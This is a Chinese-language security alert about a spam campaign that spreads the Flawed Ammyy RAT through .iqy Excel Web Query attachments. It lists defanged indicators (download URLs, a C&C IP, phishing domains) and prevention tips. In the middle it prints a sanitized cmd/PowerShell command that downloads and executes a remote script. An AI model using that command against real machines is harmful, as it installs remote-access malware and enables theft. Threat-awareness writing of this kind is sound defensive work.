垃圾郵件千萬別點，會感染Ammyy RAT病毒！

毫無疑問，惡意軟體仍然是用戶每天面臨的最著名和最危險的在線威脅之一。惡意行為者在各種網路攻擊中使用它來竊取個人信息，獲得對計算機系統的完全訪問許可權並在PC上執行他們想要的任何操作。

這就是遠程管理工具（RAT）的情況，網路犯罪分子利用這些工具遠程完全控制使用Windows的用戶PC並使用惡意軟體感染它們。

安全研究人員最近觀察並分析了一個新的垃圾郵件活動，其中一個名為Flawed Ammy的RAT被用作有效載荷。

該名稱來自一個合法的軟體，Ammyy管理員遠程桌面軟體 版本3，超過7500萬家庭和企業用戶使用。此RAT以前曾用於其他有針對性的電子郵件攻擊和垃圾郵件活動。

Flawed Ammy RAT如何傳播？

在觀察到的垃圾郵件活動中，惡意攻擊者可以輕鬆完全控制受害者的機器，如果他們點擊並打開通過電子郵件收到的文件。

請記住，此攻擊使用Excel Web查詢文件（.iqv） 附件，該附件是一種用於從Internet下載數據並將其直接複製到Excel工作表的文件。

不需要的電子郵件附帶以下內容（為了您自己的保護而進行了清理）：

主題行：

IMG_005

附件：

img_005.zip - > img_005。IQY

如果受害者打開附件並點擊它，將下載Flawed Ammyy RAT，惡意演員將從這個位置運行它http：// 24hourssupports [。] Com / img01 .gif（為了您的安全而進行了清理）

惡意文件實際上是一個Powershell腳本，可以執行以下命令：

= Cmd | "/ c C： Windows System32 WindowsPowerShell v1.0 powershell.exe -nop -NoLogo -c IEX（（new-object net.webclient）.downloadstring（「http：// 24hourssupports [。] com / img02 .gif 「））"！A0

如圖所示，此PowerShell腳本激活另一個（img02.gif）的下載，其中包含啟動cmd.exe會話並將「cmd_.exe」文件刪除到Windows臨時文件夾的功能。

之後，配置了Flawed Ammyy RAT，以便攻擊者可以連接到受感染的計算機並與位於此IP地址的以下C＆C伺服器通信：169.239.128 [。] 149，並執行惡意活動。

安全研究人員還發現，同一台伺服器也被用於針對iCloud和iTunes帳戶的網路釣魚攻擊：

appleid.itunes.kontolasumeme [。] com

appleid.icloud.asuppepekmemek [。] com

據VirusTotal稱，在我們編寫此安全警報時，60個中只有3個防病毒產品設法檢測到此惡意.iqv文件。這意味著它可以繞過防病毒過濾器，並且需要其他安全解決方案來增強保護。

Heimdal Security主動阻止這些惡意域名，因此我們所有的Heimdal PRO 和Heimdal CORP 用戶都受到保護。

如何保護您的計算機免受RAT攻擊

此類惡意軟體可以首先逃避檢測，因此必須採取所有必要的安全措施來保證數據的安全。

更新您的操作系統，包括所有應用程序和軟體程序，因為它是惡意攻擊者利用漏洞的第一個地方。

我們一直在提醒：不要打開電子郵件或點擊看起來可疑的文件/附件;

始終 備份所有重要數據，包括外部來源（如硬碟驅動器）或雲端（Google雲端硬碟，Dropbox等）以存儲它。

確保您的計算機上安裝了可靠的防病毒程序，以保護您的寶貴數據免受在線威脅;

使用多層保護，始終建議採取預防措施，因此儘可能多地了解如何更好地檢測垃圾郵件活動是正確的心態。我們建議關注白蟻網安的公眾號（baiyiwangan）， 以獲得更多的網路安全行業知識。

保持安全，不要點擊收件箱中的所有內容！

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！